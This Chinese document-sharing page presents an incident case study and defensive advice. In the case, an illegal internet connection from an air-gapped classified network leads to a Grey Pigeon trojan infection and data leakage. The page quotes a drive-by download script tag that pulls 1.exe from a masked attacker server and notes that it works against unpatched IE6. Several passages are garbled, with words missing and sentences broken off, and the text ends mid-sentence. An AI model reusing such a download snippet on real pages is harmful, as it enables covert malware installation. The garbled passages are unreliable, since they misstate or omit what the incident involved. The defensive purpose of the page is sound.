非法外联后木马引起的的问题和解决办法.docVIP

非法外联后木马引起的泄密和解决办法 安全事件描述 某单位的网络包括内部网（涉密网）、外部网（公开网站等）两个部分。 出于安全的考虑内部网、外网进行了物理隔离。两个网络的数据不能相互通信。而涉密网也与因特网隔离，保证了涉密数据不外泄。 然而在日常工作中，涉密网中的的某个人员想在因特网上进行数据查询，考虑到去外网计算机中查询不太方便，该职员就打算在涉密网终端上通过连接外网网线的方式进行因特网访问。在该职员连接到因特网进行网页浏览时，去访问了某个经济论坛，正好该论坛被黑客进行了攻击，网页上被挂了利用“网页木马生成器”打包进去的灰鸽子变种病毒。 黑客利用“自动下载程序技术”，让该职员不察觉的情况下被种植了木马。（该技术在网页中利用SCRIPT LANGUAGE=icyfoxlovelace src=http://***./1.exe/SCRIPT代码实现木马的自动下载， 代码中“src”的属性为程序的网络地址，本例中“http://./1.exe”为放置在自己Web服务器上的灰鸽子服务端安装程序，这段代码能让网页下载该程序到浏览它的电脑上。把这段代码插入到网页源代码的/BODY…/BODY之间用没打补丁的IE6打开，IE的临时目录Temporary Internet Files文件夹中有一个“1.exe”文件，这也就是说，该网页已自动下载了放置在Web服务器上的灰鸽子木马。灰鸽子是反弹型木马，该木马能绕过大多数防火墙的拦截，中马后，即被控端能主动连接控制端（客户端），也就是说，一旦被控端连接到Internet，在控制端那里，被控端就会“自动上线”一起网络间谍案调查中，有关部门从某部门的电脑网络中检测出了不少特制的木马程序，检测结果表明，所有入侵木马的连接都指向境外的特定间谍机构。专业部门进行检测时，测出的木马很多还正在下载、外传资料，专业人员当即采取措施，制止了进一步的危害。现在，一些安全性较高的内部网络（军事部门的网络）常常采用和外部网络（如Internet）实施物理隔离的方法来确保其网络的安全性。物理隔离确保了外部网络和内部网络之间不存在任何可能的物理链路，因此这种安全手段对付外部攻击是十分高效的。但是，假如这样的网络中有某个主机通过拨号或其他形式私自接入外部网络，这种物理隔离就会被破坏。黑客极可能通过该主机进入内部网络，进而通过嗅探、破解密码等方式对内部的关键信息或敏感数据进行收集，或以该主机为“跳板”对内部网络的其他主机进行攻击。一直以来，安全防御理念局限在常规的网关级别（ 防火墙等）、网络边界（ 漏洞扫描、安全审计、防病毒、IDS） 等方面的防御， 重要的安全设施大致集中于机房、网络入口处，在这些设备的严密监控下，来自网络外部的安全威胁大大减小。但是来自网络内部的安全威胁却是多数网络管理人员真正需要面对的问题。在目前网络管理工作中，对网络的正常运转威胁最大的是客户端安全管理。内网的客户端构成了内网90％以上的组成，当之无愧地成为内网安全的重中之重。实践证明，单纯的物理隔离手段还不能够完全将内部网络与外部网络隔离开来，对内网客户端机器使用、管理还存在安全隐患非法外联人为故意或无意的疏忽在内网与外网间开出新的连接通道，外部的黑客攻击或者病毒就能够绕过原本连接在内、外网之间的防护屏障，顺利侵入非法外联的计算机，盗窃内网的敏感信息和机密数据，造成泄密事件。木马具有高度的隐蔽性，入侵后用户毫无察觉，这也给黑客盗取用户私人信息提供了“有利”条件。黑客往往通过邮件、IM工具以及网页挂马等方式将木马植入用户电脑，进而获得用户电脑的控制权，接下来就可以对用户电脑内的私人信息为所欲为保密单位的内部工作网是不与互联网连接的，但有关部门做安全检测时仍然从中发现了境外情报部门的木马，外间谍部门专门设计了各种各样的木马，并且搜集了我国大量保密单位工作人员的个人网址或，只要这些人当中有，摆渡木马悄悄植入，摆渡木马立刻就感染内网，把保密资料入侵最终的。控制端随着网络的飞速发展，单机版的防病毒软件面临着集中管理、智能更新等多方面的问题，已经不能满足应用环境，病毒防护。服务器为资源共享和信息交换提供了便利条件，但同时也给病毒的传播和扩散以可乘之机将病毒在本地清除而不扩散到其他主机或服务器通过网关把病毒拒绝在网络之外是最好的解决办法。可以防止将网络内部受到感染的病毒文件传到当中，使得各个网络能够互相独立。通过网关把病毒拒绝在网络之外病毒防护 终端防护技术 采用终端管理系统，这是对局域网内部的网络安全行为进行全面监管，检测并保障桌面系统的安全的产品，能有效保障桌面系统及机密数据的安全。 安全管理 安全审计系统 采用安全审计系统软件。 安全管理平台系统 引入安全管理平台系统，这是单位安全管理团队非常必要的技术支撑系统。 信息安全管理平台能实时对网络设备、服务器